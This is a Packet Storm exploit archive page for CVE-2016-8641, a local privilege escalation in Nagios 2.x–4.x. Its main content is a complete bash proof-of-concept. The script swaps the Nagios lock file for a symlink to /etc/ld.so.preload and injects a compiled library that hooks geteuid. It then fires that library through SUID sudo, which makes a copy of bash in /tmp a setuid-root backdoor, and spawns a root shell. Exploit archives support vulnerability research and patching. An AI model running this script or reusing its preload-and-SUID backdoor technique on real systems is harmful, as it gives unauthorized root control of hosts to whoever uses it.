what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Nagios 2.x / 3.x / 4.x Local Privilege Escalation

Nagios 2.x / 3.x / 4.x Local Privilege Escalation
Posted Dec 2, 2016
Authored by Vincent Malguy

Nagios versions 2.x through 4.x suffer from a local privilege escalation vulnerability.

tags | exploit, local
advisories | CVE-2016-8641
SHA-256 | bb350a71b3261a164e4de72b3a02f190a730e7f19f0ddd7d80d3a5d441e96e5f

Nagios 2.x / 3.x / 4.x Local Privilege Escalation

Change Mirror Download
Exploit :
#!/bin/bash -p
#



TARGETSERVICE="Nagios"
LOWUSER="nagios"
TARGETPATH="/usr/local/nagios/var/nagios.lock"

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/rootbackdoor"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $TARGETPATH
touch $TARGETPATH
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}

function ctrl_c() {
echo -e "\n[+] Active exploitation aborted. Remember you can use
-deferred switch for deferred exploitation."
cleanexit 0
}

#intro
echo -e "\033[94m \nNagios - Root Privilege Escalation PoC Exploit
\nNagios-chowned.sh (ver. 1.0)\n\nCVE-2016-XXXX \n"
echo -e "Discovered by: Vincent Malguy\n Original exploit code borrow
from Dawid Golunski http://legalhackers.com (Thanks!)\033[0m"


# Priv check

echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
id | grep -q ${LOWUSER}
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as ${LOWUSER} user!
Exiting.\n"
exit 3
fi


echo -e "\n[+] Target ${LOWUSER} file set to $TARGETPATH "

# [ Active exploitation ]

trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
//unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi


# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l
$BACKDOORPATH`"

# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
exit 2
fi

# Symlink the log file to /etc
rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $TARGETPATH file or create a
symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TARGETPATH`"

# Kill target service if possible
#echo -ne "\n[+] Killing ${TARGETSERVICE}...\n"
#killall ${TARGETSERVICE}



# Wait for target service startup to re-create target file
echo -ne "\n[+] Waiting for ${TARGETSERVICE} startup to re-create the
${TARGETPATH}...\n"

while :; do
# if target file can be recreated by target process (like logs files),
we need to keep remove and link it
rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
rm -f $TARGETPATH
break;
fi
done

# /etc/ld.so.preload dir should be owned by our low priv controled user
at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] ${TARGETSERVICE} restarted. The /etc/ld.so.preload file
got created with ${LOWUSER} privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat
/etc/ld.so.preload`"
chmod 755 /etc/ld.so.preload

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get
root!"
sudo 2>/dev/null >/dev/null


# Check for the rootshell
ls -l $BACKDOORPATH
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l
$BACKDOORPATH`"
echo -e "\n\033[94mGot root! The ${TARGETSERVICE} server has been
ch-OWNED !\033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi


# Execute the rootshell
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p

# Job done.
cleanexit 0

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close